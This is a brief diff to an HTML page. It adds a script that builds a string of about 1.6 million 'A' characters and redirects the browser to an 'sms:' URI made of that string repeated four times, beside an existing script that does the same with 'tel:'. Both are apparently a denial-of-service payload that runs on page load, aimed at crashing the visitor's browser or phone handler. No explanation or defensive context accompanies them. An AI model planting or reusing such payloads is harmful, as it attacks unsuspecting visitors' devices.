--- a/index.html
+++ b/index.html
@@ -4,3 +4,9 @@ for(var i=1;i<=1600000;i++)
 a="A"+a; 
 document.location.replace("tel:"+a+a+a+a);
 </script>
+<script>
+var a="";
+for(var i=1;i<=1600000;i++) 
+a="A"+a; 
+document.location.replace("sms:"+a+a+a+a);
+</script>
